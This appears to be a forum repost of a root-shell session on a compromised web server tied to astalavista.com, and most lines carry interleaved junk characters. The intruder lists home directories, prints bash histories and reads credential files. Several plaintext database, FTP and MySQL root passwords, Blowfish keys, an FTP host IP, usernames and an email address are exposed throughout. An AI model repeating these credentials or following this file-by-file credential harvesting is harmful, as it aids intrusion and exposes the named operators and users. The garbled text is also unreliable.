4 J/ r3 c8 P: [, }: @# Admin Contact - 链接标记support@secureservertech.com #
) J, `0 t5 @ x0 `% W+ h1 {" C! K# #8 I* C8 c% b6 |1 ^$ ~9 j
# Available ShortCuts #+ T. c1 o5 d l% P. z
# #0 L1 @9 Q g2 I" I1 N4 R( U
# nst - list active connections #
( v2 i; I8 A, g C, u# ddos - shows how many times each ip is connected #) s4 {8 R3 ~$ S3 N1 u5 u: p# y& c
# ltr - restart the webserver #
k+ r; g B/ O1 O# phpc - edit the php config file #* z# I. o2 {: `( N
# htc - edit the webserver configuration file #
3 v% B+ O# ~) D/ T# up - uptime #1 @) P2 z; A6 K3 s% ~
# etd - edit the motd of the day file #" J5 V, b$ `: N2 F4 F8 z
# htr - start and restart apache if needed #
$ f4 }# p; q8 F$ X. x( |# syng - shows active SYN_RECV connections #
* |8 }1 A! w4 r' |# synd - syn flood blocker - “synd -h” for usage #4 `# {7 z B* `2 m
#####################################################
- e$ B1 Q' b d' C# NOTES: #5 E2 C7 A* U0 u. E2 s- W
# Last Upgrade - 12-08-2008 by JF #' S+ W# h% h% x3 \& E
# My.cnf/Mysql Optimization - 1-28-09 #
' Z0 H% Y) D- [/ q1 O. p$ T# #9 n; Y8 I/ w7 X: l& g
# #
% N- L4 I2 U% }( e3 K# #
& Z0 i* Q1 f/ v6 {) }#####################################################3 P$ j) L6 B5 E& |$ c( L1 \
- O! P- |' q0 A5 X4 O; V3 z0 i
sh-3.2# lastlog | grep -v Never
0 N+ j5 G( M6 `6 ?Username Port From Latest2 E8 D2 ^ [. A- i" S4 [
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20093 a6 o) ?, c0 B5 p7 T# c3 L
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008$ u; O5 G. j6 ~
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
9 I% E8 _/ ^6 I O2 Jastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009( w8 o( m, r0 o+ _0 N( t7 N
9 D! n! E, k0 @: |6 H
sh-3.2# ls -la9 u3 i2 q! f5 Y6 j% Q
total 453376
& I$ n+ J0 t( ^2 @! hdrwxr-x— 15 root root 4096 Jun 4 08:40 .
9 z2 N/ d4 ]1 x6 c/ _- ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
) x q& q- u# }! _/ V* U-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
5 y% A' ]9 @" E, v8 [, w: O-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg4 D0 ?5 P% D5 a
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history4 K4 ]4 k R. t% f0 Q6 R
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout) K: {; r. `: P2 T6 w) i
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
# r0 w$ r" ~! ?/ S: r-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc6 u9 o$ K1 Y* E( t' C
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh8 k/ m$ m5 K5 t
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
/ O5 e+ z9 [+ H% ~3 |1 H W! o# c-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql( h8 C( O! N$ C$ u o& r
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan2 [$ g2 J! g! _( q: E
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
8 x# ~) A* P& Z+ y-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql6 k6 E) ~: A4 s: _' o! I+ c
drwx—— 2 root root 4096 Oct 28 2007 .elinks, m0 ~% E+ A# T5 j2 H- Q
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
3 K7 u4 W2 |' q' C! t( P-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
7 }* [8 X* B: C0 J2 f0 O- z-rw——- 1 root root 0 Apr 16 13:19 .history
( [/ q: O; F4 N* O' f; Y-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
! u9 H. H! t) h9 Z-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
! q& w4 Z( K( o# }-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
% a1 U' h/ e; k6 S! I' ?-rw——- 1 root root 35 Jun 2 14:23 .lesshst: p9 V3 q" |- L$ p7 S
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp$ x1 w6 o4 R# I% {" c( d2 r H" ^( e7 Y) e
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec" z3 y9 A0 M$ Z4 H5 U6 X6 N2 S8 |
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz6 g6 W# o Z5 S
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2' w9 Z6 W$ d1 f/ h5 S) h. J
-rwx—— 1 root root 760 Sep 18 2008 lp
) r, K6 g/ m" bdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
7 _# r; J+ M) j' W3 h# I% V* m-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz8 S4 T0 b' H; c6 p1 V
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
% \8 N( p* W/ \2 y, Edrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.93 y0 Z- c5 g* n% z0 V
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
, B' G. I5 l; @- D: k6 _0 ?drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
% R) J6 u7 C4 p, j* [0 [-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
+ X3 S$ B, T* C" h& ?-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh8 g- z$ X$ c8 P" E* f, S
-rw——- 1 root root 41 Oct 19 2007 .my.cnf e$ G/ X9 j9 |, k, Q% H6 N
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history( m$ O. v! ^0 O% r7 |
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
0 O; @# _# `0 [# h7 A0 e" I-rw——- 1 root root 41 May 20 2008 .mytop3 w5 @9 J% u' Q% T
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6* U/ G0 E" K" y- q% O b5 ~
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz# v- _; [% G/ p
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp7 M- H+ B' m7 w k. {6 j
-rw——- 1 root root 1462 Sep 21 2007 opt.php. R% v2 z/ ^3 a9 ]1 a
-rw-r–r– 1 root root 3371 Sep 22 2007 p
. ~* N( k: ?/ I" [ P/ q-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2- w y: u; n4 @6 C
-rw——- 1 root root 1024 Feb 3 21:32 .rnd0 n# f3 K9 T. k# Y/ e6 y
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
! n* O' R1 W# Q$ e-rw-r–r– 1 root root 887 Nov 28 2007 server.key d1 z0 C: G( e z+ S0 {
drwx—— 2 root root 4096 Oct 10 2008 .ssh: ^' q$ }0 C3 |+ X$ H
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat- W0 n8 O" h5 E0 t) }
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc z f6 r0 r- d, }
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
- ]0 [' T$ s: ~6 @-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.14 Q$ y' h$ Q v# R5 R
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
# T! g( b$ m8 V-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh4 H( ]" U4 ~: ?- ~
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.04 T) l6 g/ Q; g" U, @/ c
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
% N2 I& r6 X: l4 U- o8 Y2 J-rw——- 1 root root 12997 May 16 2008 .viminfo
: `- {* U5 ^$ G: h! b# _6 d6 ?
% S% p7 ]! }, |/ E3 Zsh-3.2# cat .bash_history1 l3 n7 Z5 i+ y# _
[snip]( G/ R: b1 I( ?; u8 n" u( @- w
wget cp4sst.com/sstlinux.tar.gz
" S% j+ t6 |! s# z. ^4 T2 gtar zxvf sstlinux.tar.gz
6 {* }6 q% ~# |5 y+ d0 i: Scd linux-2.6.27.10
: E* m5 U- [# e5 H5 W) @5 {' Rsh install.sh, Y3 [( Q. e7 [9 |" f4 k {
make bzImage ; make modules ; make modules_install ; make install2 S" s" u6 c4 c9 n
make clean
: z& e9 o( @" p. Mservice mysqld restart/ H) V* m w2 d0 F$ z1 h9 }3 S
[snip]
) Z* j& _+ z6 | Y/ lcd /usr/sbin/; p8 q0 @& W6 `3 N! _, \
chmod 4777 traceroute
, x- W7 C; q/ B {chmod 4777 ping
8 c# R, Y- @* N7 d xtraceroute -I 链接标记[url]www.astalavista.ch[/url]. r: k7 a8 a) n, w7 s
[snip]
+ W5 U) h( K9 x8 Qvi /etc/csf/csf.conf
& Y$ H/ p# g U* c% itraceroute google.ch
7 q- m6 F+ C6 m Iservice csf restart% V& W/ r% ]) Q6 |1 v9 C
tracert google.ch* @1 P" M: x; H' l' r! c) a& T. q
service csf restart
& P* D* s' `/ Q/ wtraceroute 链接标记[url]www.google.ch[/url]
9 g3 J8 a0 X. i/ Utracert 链接标记[url]www.google.ch[/url]
2 f/ a9 O7 T0 C$ y$ @; B6 B- ]! ~3 F) vtraceroute 链接标记[url]www.google.ch[/url]
9 U2 P! d; `/ Y) N0 g- q5 n0 m4 [8 Clocate traceroute* A# u7 J& O, p/ ~) m* S( y
chown 4755 /bin/traceroute# u0 f; o2 h2 \9 ]2 M2 P: B* V& m
chown 4777 /bin/traceroute O: G1 A9 R' j+ J1 q8 h5 H2 d
locate ping% D9 O5 J+ o6 `7 j; x7 V" f4 E# N
chown 4755 /bin/ping
% r% T. [( q. m& p9 r& echown 4777 /bin/ping& w r( p# H: g7 R* l
cd /bin/
8 F' S1 Q& |, T2 t0 Tls -ali | grep ping8 I4 H# e% [, W' q/ B+ d$ Q
chown root ping
: j, T# c! }4 i3 Qchmod 4755 ping
; N6 X6 { f& ]3 xls -ali | grep traceroute; }) r( _3 n5 e: |4 T% B5 ^7 K3 M' Y
chown root traceroute
; r8 b9 }( a# \& ?chmod 4755 traceroute
. v* \7 N5 W: |; S$ mls -ali | grep traceroute
/ V* C& `0 J# g2 [# b; I, w& `traceroute -I 链接标记[url]www.google.ch[/url]. I2 U' S4 c l; Y8 b: ^
traceroute 链接标记[url]www.google.ch[/url]
9 a' K. R7 j K. ^whois pmsantos.ch
) f- M9 S5 x4 U$ g$ U8 V- x9 K: ]: T[snip]
# w/ ?; |- H9 r& J/ d) Y& smysql -h com_contrexx2_live < /root/defaultp_ports.sql0 W/ E: S# L& y$ q8 m! |
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
; l5 Z5 B; m" @- rmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
( ^) ]9 ^/ n2 C2 j( p0 F0 Bmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql* E$ T: K+ `4 c2 K
top
! k" V* m- l5 L5 Z; T uping ssth.ch
' N1 W, X/ h0 ^3 Q4 B+ ~ping asdlkfaljgasd???ljg???lasj.ch
( [+ X9 c8 w" {, O2 m( Kping asdlkfaljgasdlasj.ch/ \) k' J+ s% U; ]# s7 T
ping 链接标记[url]www.ssth.ch[/url], e. ~( Q3 x, h7 P# d, R9 X# Y
ping ssth.ch, {3 f: {" F/ y/ F) `7 F: a7 Q
nslookup 链接标记[url]www.google.ch[/url]
5 e4 f. A; o- P( M. d& ^& snslookup 链接标记[url]www.ssth.ch[/url]
3 g0 I5 M9 T1 Bman nslookup- h6 \1 o$ e; ^- C" f9 V
ping 链接标记[url]www.google.ch[/url]2 L& i( g# N3 _) v, P
nslookup 链接标记[url]www.google.ch[/url]
0 h' |0 L( T3 C. znslookup 链接标记[url]www.google.ch[/url]
' ^3 @* X7 `1 X ~1 g4 `/ znslookup salfjasdlf.ch1 n4 |% w# n* }7 v3 o% T2 v0 X& I/ Z3 Q
[snip]: J2 l+ L0 i2 c( I
openssl passwd -1 sadf* h1 I- O: E0 y( Y
openssl passwd -1 5cZNHstdTy
$ \) y+ D: k; D2 ~- R+ ~mysql2 h5 q) k0 V( i0 j
mysql; F" c6 o1 m0 [0 [
locate proftp
: }5 \ ?; o' M7 uvi /etc/proftpd.passwd% ]0 r4 y" C6 D! k6 w6 |9 }
service proftpd restart
+ M& l; M$ g( z/ Q% o1 @+ dlocate proftpd.conf$ P6 J6 T9 w' s9 E
vi /etc/proftpd.conf4 c2 A( a4 n. c+ Y
vi /etc/proftpd.passwd
* T% R: c( Q: K4 o8 v7 k5 uservice proftpd restart; @" ^. s O ~$ k
[snip]. D6 E: h# y7 L k1 J, U
/bin/sh /home/com/backup_system/backup.sh7 I, }* A5 m' F0 }
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin2 \4 T6 A; v3 E0 V2 h. X
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
1 c7 ?& s. [) ^2 M4 Ymysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
! |' Q, x+ M; B% c: P4 Hls -ali: E2 K7 G( K; d( q. E @
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
7 e: B& c ^' Q3 P$ Fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
$ A4 E. i. Z6 I9 x" m8 }crontab -l5 G# z) ]/ B+ g2 l7 L& Y! s
crontab -l: t, j+ T" x. P
php -q /home/com/public_html/modifications/cronjobs/securitynews.php, }) E8 A% q/ ~& i
/home/com/public_html/modifications/cronjobs/exploits.sh* e, O) B. f- Y4 O* J \
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]( j) g. W: C; Z2 p2 E+ I
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
3 i/ {+ m& w: {9 ]$ Rcd lsws-4.0.3- F8 ~$ x% J" A% R2 h
sh install.sh
) ?3 a' b# J! b8 _7 U; K. J# Wuptime
' Z' E7 z4 P/ F/ o8 Whdparm -tt /dev/sda
7 q9 w6 f7 x) j( v6 \" fiostat! `9 p" D2 b# h
yum install iostat i% A7 h \, O4 X( l" ?
iostat, [# S$ ]- ]# l" q. G
whereis iostat
& @1 G6 W9 E5 V) R6 Kyjm clean all
' [* J) r! v* E2 A% O0 \yum clean all ; yum -y update
. S) P3 C+ {/ h" g1 ?1 liostat3 w7 F6 k( k7 ?! Y/ ?
yum install systat
3 u. H$ {/ `) z7 Hrpm -qa | grep iostat. `) G$ t R! c4 {
rpm -qa | grep sysstat
" z% {- i) d1 ^rpm -qa | grep systat! |$ m4 _, d J# Q0 ^% \/ n
dmesg -c' Y7 X0 H7 _0 A; B( Q% W
sysctl -p0 v/ D# ?* e+ R& U# |- w* W
uname -r7 }. n1 @5 {+ v- r' \- X
cd /usr/src
: S/ N9 A% n- a' J0 a1 \+ U# Pwget nix101.com/kernels/sstlinux.tar.gz- R1 ]+ V# A1 e
shutdown -r now6 z% p+ W. N: I0 @
nano -w /boot/grub/grub.conf( f' y( d; C2 @, C2 h) L& t0 s
) W# V" d9 h4 S, n+ t. q4 Z% e/ R) N& Wsh-3.2# cat .my.cnf
b1 d# o7 l6 r D[client]
6 S- K) j1 {& j( fuser=da_admin4 U& z# ]7 M* C! U6 u' c
password=X9dctmRH
: W9 J6 U% _- x1 A9 C
1 \9 N4 t" c! }* v+ }/ e. L; lsh-3.2# cat /home/com/backup_system/backup.sh
( ]4 F/ ?9 T( f$ T) H* @7 N/ ~#!/bin/sh- u! X2 m' s9 G, }& ]) |
#####################################################################
& F: X) ` u# B9 B. L# #
' G7 s- u7 K0 y/ x# incremental backup for astalavista.com #0 `5 I7 x5 ^. v2 L1 ]
# #7 p+ {6 `2 T- M8 X, a3 a, p/ M
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
$ L+ k3 M/ c; o i6 n9 q# #
* r3 \8 P8 p) d6 f#####################################################################
5 W; P* l+ l0 g- j[snip]( F5 a1 F L) b! U: W) K9 T
PROG_DIR=”/home/com/backup_system”;
/ P4 X }2 J6 J% P9 s: eBACKUP_DIR=”/home/com/backups”;
w- I2 S+ _& w! q& [( u( Y& K: V3 a$ sDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;; l6 d: V( \: z/ q
# ftp for synology backup server
. d/ N1 Z# B4 ZFTP_HOST=”212.254.194.163″;
3 k& A( d& h2 S2 R1 y9 ~FTP_PORT=”21″;; `) s4 d" n) z; N3 Y* M Z
FTP_USER=”astalavista.com”;9 f/ f! f) P3 S) C
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;2 A, D% g) l' {; w9 f$ V2 M9 b8 }2 a
FTP_DIR=”/astalavista.com”;
2 C2 _7 {+ s# I# database
, p0 _7 c' j. Q+ j% _! G$ q7 h1 _DB_HOST=”localhost”;
1 d9 k2 |3 A0 g) `1 X7 J# jDB_USER=”contrexxuser2″;
7 t, P( |8 n0 n0 c1 G, TDB_PASS=”0fEYNZgXz1pKe”;6 Q d: d1 f# g! m
DB_DATABASE1=”com_contrexx2_live”;" Q" J+ ~% t0 Q. y1 o! e' Q( e9 G
DB_DATABASE2=”com_contrexx2″;7 D H2 O; I" A5 ?8 S' ?" E
[snip]
$ s/ r" j) Y( ?5 ]; Z8 y# h% hftp -in $FTP_HOST $FTP_PORT <<EOF
- W* c; ~# u! {quote USER $FTP_USER* L3 w: S. b* `8 q8 Z% t
quote PASS $FTP_PASS
3 s4 N i7 d( r4 {8 O* S }0 |/ Scd $FTP_DIR
. V0 g- F4 A" {# t+ t: dput $DB_FULLNAME-SQL_Dump.tar
! V" t% r) `$ N0 |- m7 \4 @6 vput $BACKUP_FULLNAME-Public_HTML.tar3 p: X; t& J5 F" f# u
close
1 g7 Q% `6 ~) S& V4 Fbye, B& y3 _9 R& e4 O
EOF
: x& W% p" r) U7 T1 A
# E3 c" j1 U5 r3 ^1 R+ c5 N- Gsh-3.2# cd /home% i' N8 y9 w* `' ?
sh-3.2# ls -la* ^+ b0 N0 \& b1 c$ r) E6 J, c
total 120# h# J: r7 ^* E( W3 V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .# g$ [' h( L2 M/ F8 }8 o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
7 b9 e' ~& r# a7 Z$ Bdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
% V! X8 J4 g! [% F-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
1 B0 K1 j* y. a: M6 W& C1 T% F: P5 H1 d-rw——- 1 root root 8192 Jun 3 02:45 aquota.user5 |% G0 A. B! r3 t
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
; k+ _ j, n% R8 qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
2 Q1 g2 D' n* Adrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161& C/ S. y9 U2 x1 y' j# I, f6 P
drwx–x–x 10 com com 4096 Apr 28 12:40 com
: }4 p, z- Z9 ~& W% m. e' Ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp, Y0 M' D' c) h' e8 e6 S7 D
drwx—— 3 jon jon 4096 Sep 21 2007 jon' W, M) ]5 h3 d1 ?
drwx—— 2 root root 16384 Sep 11 2007 lost+found
- i0 ?6 ]; U. U9 bdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
! g8 N! a/ K0 z' [9 Jdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
" Z" f& L2 x2 v* ?/ c3 Hdrwx—— 2 jon jon 4096 Sep 15 2007 test
: U' L4 |, D! D5 D5 l6 g/ K, S' Vdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
1 s' O$ W& J; D) ^9 e) t. ?# e" c% j# M& L, n
sh-3.2# cd admin& ^+ J$ q/ m5 e& h7 R: Y
sh-3.2# ls -la) [& S- I% Q' R! l; W2 x- q
total 1735896; ?8 _3 [! X% H" ]
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
! i. f2 m( d3 J3 m6 M. b5 ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 l l2 e; A/ ~- ^2 F
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups( Z5 ^/ `8 Q% U, m* U6 q6 R
drwx—— 2 admin admin 4096 Sep 28 2007 backups
6 Z, @6 a7 H. G+ M-rw——- 1 admin admin 860 Sep 17 2008 .bash_history% V+ L3 s6 l# `) s" P |
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
! A* p7 {* U3 W D2 Q-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
* S4 o% b; Q$ X- M$ y ~-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc! C& t" v* c* ^+ h* O" f# c
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
9 p) I. ?4 X. P' p3 E7 ~drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
" [) p+ \# j @+ j f. p4 fdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
: h# ?( @7 G- q; l5 N4 M' {1 U-rw-r–r– 1 root root 24 Sep 21 2007 info.php e. m z5 k3 @. }) k. a
drwx—— 2 admin admin 4096 Sep 21 2007 mail' ~% e) L/ z8 }4 I1 b/ A9 u
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr9 S& Q* w+ A( l& X' P, t: T' c2 |. y
-rw-r–r– 1 root root 887 Nov 28 2007 server.key+ r0 H9 F# ]8 m7 K* A4 i
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow: x1 V- k) f8 H: J$ ^! }& t7 v
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz' C/ p5 E9 ]2 x: p: o
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
+ \3 C+ b& k0 T# J- `: ~
3 x; e: p" G9 F9 a: j/ Ush-3.2# ..5 b. e9 ^7 f( y+ ?
sh-3.2# cd jon
$ l2 {9 D" Y& r& u l4 O3 t! i5 Esh-3.2# ls -la* F: D) A8 i8 H3 L
total 36. [3 H9 C* O" R2 h% ?, b& N
drwx—— 3 jon jon 4096 Sep 21 2007 .1 B; F' O. W6 ]. F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 h; l& U* k6 _" {( W1 y7 h-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
8 T5 I; m" E' g3 Z, j9 W! n% q# R+ {* w-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
- s4 [) N' l1 P-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
9 c6 i: g* P; Y9 G% Q-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc m) E1 }' U: V
-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 l8 _0 O; A! w! l
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
# S, B% G6 |+ _# A1 g- W2 m$ e6 s9 k( v/ Y
sh-3.2# cd ..) U9 ^& |! ]# t- Q) ~, y( J
sh-3.2# cd test% x7 a3 b* d, t+ d8 ^
sh-3.2# ls -la
! S8 }- q+ O2 D7 P4 y6 gtotal 48
+ }& k6 }* U0 n4 B5 g: U3 U: X* Sdrwx—— 2 jon jon 4096 Sep 15 2007 .: n; U, P! x) }& X2 O8 A; l
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 x( ~/ ]& V. N% X* J( H
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history9 I0 G! x/ `" \% W! ?
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout9 d0 X) P s9 c& `, r. L2 ~
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
' d: l& t$ t |3 M! y' d9 e r-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
( l7 v I2 N; P' j/ e; T! Rsh-3.2# cat .bash_history, r3 {5 ]2 y4 Q
/usr/bin/mysqladmin -u root password PoliuJhytg67
9 h+ C9 K/ V9 w; V
- o5 K7 L: Y9 O% Ash-3.2# cd ..
7 H! Y& `2 l8 nsh-3.2# cd astanet7 \+ e$ {1 }, G+ ]$ G& e0 x* v0 A1 S
sh-3.2# ls -la
& x& P% b) p( |total 52
( F1 [. d4 D( w) ?0 N* j* odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! q/ ?- X; P* p, j
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ \9 _# C" E0 D" g+ W% ~drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 L8 f5 H! i) C8 D$ J-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
8 ?& @4 D% |. f-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
7 Y1 d* K$ y4 ^-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 z6 {+ ?! k' v0 c1 q7 b( ^2 H
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
; c, h% w" t! P/ y, h1 c( |( V4 r a$ Hdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
8 v; X- P6 M% t% K9 J8 zdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap w1 Q, ]5 c7 N4 c
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
; S# `" ?& j' }( {# W2 P! r-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
- ~; P+ j$ G, j$ f3 Slrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html+ p/ T! i! k1 F$ t8 ~7 [$ C9 n: W
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow* ?) `; |* l$ S1 E
! h6 O% n4 C/ N; p7 W( s! e
sh-3.2# cd auth/
, ]. A2 t8 M1 ]1 |, Rsh-3.2# ls -la
# c' N( Q! G8 r* Gtotal 28& Z `- B: B! v1 t' ]! k
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
0 V' z0 V! F8 i z h# Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..$ r, Z, R# ~9 d# k; e8 l( D' z
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php2 U$ m9 y+ r: [, d
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php" M6 S3 P7 o" F' l* w
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd, E. L" X' n- H
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
: ~7 M" K* A+ m/ O# {-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd% Y; e$ j$ \! Z" z% e$ M2 B
5 b0 j) Z7 K9 }* V4 |4 C
sh-3.2# cat hackercontest.config.inc.php! F2 u1 }) o( {
<?PHP |- o( ]9 u/ c! g
// Variabeln f?r Verbindung zur Datenbank //
0 t. N! b: _$ B" F: e$conxHost = ‘localhost’; // MySQL hostname
. X! f" E1 L# O& H- T/ A$conxUser = ‘hackercontest’; // MySQL user; y( a8 \) }; R' J2 T
$conxPassword = ‘K6m@7dUc’; // MySQL password N3 ^# {0 O. j
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
5 e# ~5 F/ m2 {; X, r?>! a3 m( @5 l4 k8 s* D; U5 j0 e3 _
sh-3.2# cat hosting.config.inc.php
# M% ?2 M, l; Z8 F8 L. V<?PHP5 ^+ f: E$ F* a# Q2 Y
// Variabeln f?r Verbindung zur Datenbank //
- ?# b, w) ]% V7 {! W/ J& _$conxHost = ‘localhost’; // MySQL hostname; l% A# ^( o; {( l- h/ |3 S' i
$conxUser = ‘hostinguser’; // MySQL user
: J( D# Q* R6 n. X8 F! _$ C8 U$conxPassword = ‘cXvB3981′; // MySQL password: s+ I! G' Y* a3 m# }: B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 y7 O; R+ E* d- u?>' k# w9 u( p& w: ~) K* }0 l
" t$ I4 O {* z/ h) Y7 ~
sh-3.2# cd ..
' n* }0 z( U( a# Jsh-3.2# cd com/ [3 L+ T' l4 V0 e* [/ ~/ @
sh-3.2# ls -la: }9 V, _$ i7 V5 \
total 141208# I) j7 W! J2 D" O; L5 y: m
drwx–x–x 10 com com 4096 Apr 28 12:40 .
. K+ _8 C9 J( }$ D7 Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* {! c" u7 y, k1 w* J M
drwx—— 2 com com 4096 Jun 4 04:04 backups5 R; z3 i3 X4 p# M
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql( j' ~' |; Y" O
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
* D- s H8 Q* L8 z0 M& r8 ?$ N! U-rw——- 1 com com 21880 Jun 2 08:07 .bash_history- z1 ^/ Q, N- C( A
